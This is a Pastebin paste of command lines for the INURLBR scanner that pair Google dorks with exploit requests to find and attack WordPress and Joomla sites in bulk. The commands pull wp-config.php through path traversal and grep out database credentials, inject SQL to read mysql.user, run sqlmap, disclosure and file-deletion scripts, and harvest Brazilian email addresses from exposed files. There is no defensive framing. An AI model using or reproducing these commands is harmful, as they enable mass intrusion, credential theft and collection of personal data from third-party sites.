Googleinurl

EXAMPLES CONTROLS INURLBR

Jan 1st, 2015
2,471
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. [!] CONTROL SERIES
  2. # AUTOR: Cleiton Pinheiro / NICK: GoogleINURL
  3. # Blog: http://blog.inurl.com.br
  4. # Twitter: https://twitter.com/googleinurl
  5. # Fanpage: https://fb.com/InurlBrasil
  6. # GIT: https://github.com/googleinurl
  7. # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  8. # PACKETSTORMSECURITY:: http://packetstormsecurity.com/user/googleinurl/
  9.  
  10. [!]::COMMANDS USED IN THE SCANNER INURLBR | https://github.com/googleinurl/SCANNER-INURLBR
  11. ----------------------------------------------------------------------------------------------------
  12.  
  13. [+] Arbitrary File Download
  14. ./inurlbr.php --dork '"canetas" "/revslider/"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-vul 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }
  15.  
  16.  
  17. ./inurlbr.php --dork '"inurl:/themes/urban/" "www"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' -t 3 --exploit-comand '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }
  18.  
  19. EXPLOIT:
  20. http://pastebin.com/ZEnbxXXd
  21. OR
  22. http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
  23. ----------------------------------------------------------------------------------------------------
  24.  
  25. [+] FILTER AND MAIL
  26. ./inurlbr.php --dork 'site:.br @ gmail|hotmail|terra|uol ext:txt' -q all -s MEGA.txt -m
  27.  
  28. cat Lista.txt | egrep '@bol.com.br|@terra.com.br' |cut -d \; -f 1 | sort -u >> bolterra.txt
  29.  
  30. cat Lista.txt | egrep '@zipmail.com.br' |cut -d \; -f 1 | sort -u >> ZIPMAIL.txt
  31.  
  32. ./inurlbr.php --dork='site:.br intext:gmail || intext:hotmail ext:txt -hdutl -upnet -static' --arquivo='TOPGMAIL.txt'
  33. ----------------------------------------------------------------------------------------------------
  34.  
  35. [+] EXPLOIT COMPONENT JOOMLA
  36. ./inurlbr.php --dork '"com_spidercalendar" +"noticias"' -s spider.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'027" --comand-vul "python spyder.py -H http://_TARGET_/"
  37.  
  38. EXPLOIT:
  39. http://www.exploit-db.com/exploits/20983/
  40. ----------------------------------------------------------------------------------------------------
  41.  
  42. [+] EGYWEB (Mantrac) <= Remote File Disclosure Exploit
  43. ./inurlbr.php --dork '"Created by EGYWEB"' -s rcdz.txt -q 1,6 -t 3 --exploit-get "/360download.php?file_name=classes/db_connector.php" --comand-vul "python rcd.py http://_TARGET_/"
  44.  
  45. EXPLOIT:
  46. http://1337day.com/exploit/22643
  47. ----------------------------------------------------------------------------------------------------
  48.  
  49. [+] Joomla Spider Form Maker <= 3.4 - SQLInjection
  50. ./inurlbr.php --dork '"com_formmaker" +"contato"' -q 1,6 -s com_formmaker.txt -t 3 --exploit-get '/index.php?option=com_formmaker&view=formmaker&id=-1+AND+(SELECT+User+from+mysql.user+limit+0,1)' -a 'mysql.user' --comand-vul "python sqlmap.py -u '_TARGET_/index.php?option=com_formmaker&view=formmaker&id=1' -p id --batch --random-agent --dbs"
  51.  
  52. EXPLOIT:
  53. http://www.exploit-db.com/exploits/34637/
  54. ----------------------------------------------------------------------------------------------------
  55.  
  56. [+] Wordpress Theme Strange File Upload / File Deletion
  57. ./inurlbr.php --dork '"movie" "/wp-content/themes/ut-strange/"' -s del.txt -q 1,6 -t 3 --exploit-get "/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" --comand-all "php delete.php http://_TARGET_/ wp.php"
  58.  
  59. EXPLOIT:
  60. http://de.1337day.com/exploit/22674
  61. ----------------------------------------------------------------------------------------------------
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×